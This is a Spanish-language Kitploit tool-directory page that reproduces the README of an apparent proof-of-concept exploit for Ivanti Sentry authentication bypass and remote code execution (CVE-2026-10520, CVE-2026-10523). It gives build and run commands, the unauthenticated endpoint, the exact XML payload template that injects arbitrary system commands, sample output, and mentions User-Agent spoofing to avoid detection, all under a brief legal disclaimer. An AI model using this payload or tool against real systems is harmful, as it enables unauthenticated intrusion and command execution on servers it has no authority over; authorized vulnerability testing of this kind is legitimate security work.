Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-10523-Ivanti-sentry — Herramienta de detección de prueba de concepto para las vulnerabilidades de omisión de autenticación y ejecución remota de código en Ivanti Sentry (CVE-2026-10520, CVE-2026-10523). Envía solicitudes API manipuladas para ejecutar comandos del sistema y validar implementaciones vulnerables. | Kitploit
Herramientas/GitHubGitHub/gagaltotal/cve-2026-10523-ivanti-sentry
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAutenticación
GitHubgagaltotal/cve-2026-10523-ivanti-sentry

CVE-2026-10523-Ivanti-sentry

Ver Repositorio
Sitio web
3114hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Herramienta de detección de prueba de concepto para las vulnerabilidades de omisión de autenticación y ejecución remota de código en Ivanti Sentry (CVE-2026-10520, CVE-2026-10523). Envía solicitudes API manipuladas para ejecutar comandos del sistema y validar implementaciones vulnerables.

Compartir

CVE-2026-10523 - Herramienta de Detección de RCE en Ivanti Sentry

Una herramienta integral de detección de prueba de concepto para probar vulnerabilidades de Ivanti Sentry relacionadas con bypass de autenticación y ejecución remota de código. Esta herramienta identifica sistemas vulnerables a CVE-2026-10520 y CVE-2026-10523.

Resumen

Este proyecto está diseñado para detectar y validar si una instancia de Ivanti Sentry es vulnerable a fallos críticos de bypass de autenticación y ejecución remota de código. La herramienta envía mensajes especialmente diseñados a través del endpoint de la API de Ivanti Sentry para ejecutar comandos del sistema y extraer los resultados, permitiendo a investigadores de seguridad y testers de penetración identificar implementaciones vulnerables.

Detalles de la Vulnerabilidad

CVE-2026-10520

Vulnerabilidad de bypass de autenticación en Ivanti Sentry que permite acceso no autenticado a endpoints de API restringidos.

CVE-2026-10523

Vulnerabilidad de ejecución remota de código en Ivanti Sentry que permite la ejecución de comandos arbitrarios del sistema a través de la API de mensajería cuando se combina con el bypass de autenticación.

Características

  • Detección no autenticada de instancias vulnerables de Ivanti Sentry
  • Capacidad de ejecución de comandos del sistema para validación de prueba de concepto
  • Soporte para conexiones HTTP y HTTPS con omisión de verificación TLS
  • Soporte de proxy para pruebas a través de intermediarios
  • Extracción limpia de la salida de comandos desde respuestas XML
  • Manejo seguro de errores con retroalimentación informativa
  • Límites configurables de tiempo de espera y tamaño de respuesta

Requisitos

  • Go 1.26.4 o superior
  • Acceso de red a la instancia objetivo de Ivanti Sentry
  • URL de destino válida con protocolo (HTTP o HTTPS)

Instalación

Clone el repositorio y navegue al directorio del proyecto:

git clone https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry
cd CVE-2026-10523-Ivanti-sentry

Inicialice el módulo y descargue las bibliotecas del paquete:

go mod init CVE-2026-10523-Ivanti-sentry
go mod tidy

Compile el ejecutable:

go build -o tot_poc tot_poc.go

Uso

Screen Capture

La herramienta requiere dos parámetros obligatorios: URL de destino y comando a ejecutar.

Uso Básico

Screen Capture

Ejecute un comando simple en el destino:

./tot_poc -url https://target.example.com:8443 -cmd "uname -a"

Opciones de Línea de Comandos

  • -url (obligatorio): URL base del destino incluyendo protocolo (ej., https://127.0.0.1:8443)
  • -cmd (obligatorio): Comando a ejecutar para detección de vulnerabilidad (ej., "uname -a", "id", "whoami")
  • -p o -proxy (opcional): Dirección y puerto del proxy para enrutar el tráfico (ej., 127.0.0.1:8080)

Ejemplos de Uso

Screen Capture

Detecte vulnerabilidad con comando simple de información del sistema:

./tot_poc -url https://192.168.1.100:8443 -cmd "uname -a"

Ejecute con configuración de proxy:

./tot_poc -url https://target.example.com:8443 -cmd "whoami" -proxy 127.0.0.1:8080

Ejecute comando para extraer información del sistema:

./tot_poc -url https://sentry-instance.internal:8443 -cmd "cat /etc/os-release"

Salida

La herramienta mostrará:

  1. Un banner con información de la vulnerabilidad
  2. URL de destino, comando y configuración de proxy (si aplica)
  3. Mensajes de estado en tiempo real indicando el progreso de la solicitud
  4. Resultados de la ejecución del comando si el destino es vulnerable
  5. Mensajes de error si el destino no es vulnerable o la conexión falla

Salida de Detección Exitosa

Target: https://192.168.1.100:8443
Command: uname -a

[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[+] Target appears to be vulnerable.

Command output:
Linux sentry-server 5.10.0-8-generic x86_64 GNU/Linux

Salida de Detección Fallida

Target: https://192.168.1.100:8443
Command: uname -a

[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[-] Target does not appear to be vulnerable.

Detalles Técnicos

Vector de Ataque

La herramienta explota el endpoint /mics/api/v2/sentry/mics-config/handleMessage que es accesible sin autenticación. El payload se construye como:

message=execute+system+/configuration/system/commandexec+<commandexec><index>1</index><reqandres>[COMMAND]</reqandres></commandexec>

La respuesta contiene la salida del comando en formato XML dentro de una etiqueta de éxito.

Características de Seguridad

  • Omisión de verificación TLS para probar certificados autofirmados
  • Tiempos de espera HTTP configurables para evitar solicitudes colgadas
  • Limitación del tamaño de respuesta (10 MB) para evitar agotamiento de memoria
  • Manejo de errores adecuado para respuestas malformadas
  • Suplantación de User-Agent para evitar mecanismos simples de detección

Cómo Funciona

  1. Analiza los argumentos de línea de comandos para la URL de destino y el comando
  2. Crea un cliente HTTP con configuración de proxy opcional
  3. Construye el payload con el comando proporcionado por el usuario
  4. Envía una solicitud POST al endpoint vulnerable
  5. Extrae la salida del comando de la estructura de respuesta XML
  6. Muestra los resultados o mensajes de error según corresponda

Descargo de Responsabilidad

Esta herramienta se proporciona únicamente para fines autorizados de pruebas de seguridad e investigación. Los usuarios son los únicos responsables de asegurarse de tener la autorización adecuada antes de probar cualquier sistema. El acceso no autorizado a sistemas informáticos es ilegal. Los autores no asumen ninguna responsabilidad por el mal uso o daño causado por esta herramienta.

Requisitos y Limitaciones

  • El destino debe ser una instancia vulnerable de Ivanti Sentry
  • Se requiere conectividad de red al sistema destino
  • El tiempo de espera predeterminado es de 10 segundos por solicitud
  • El tamaño máximo de respuesta está limitado a 10 MB
  • Solo es efectivo en sistemas que ejecutan versiones vulnerables de Ivanti Sentry
  • La validación del certificado TLS está deshabilitada para fines de prueba

Autor

GhostGTR666 - Gagaltotal666

Repositorio

https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry

Licencia

Este proyecto se proporciona tal cual para fines de investigación de seguridad y educativos.

Referencias

  • CVE-2026-10520: Bypass de Autenticación en Ivanti Sentry
  • CVE-2026-10523: Ejecución Remota de Código en Ivanti Sentry
Descargar herramienta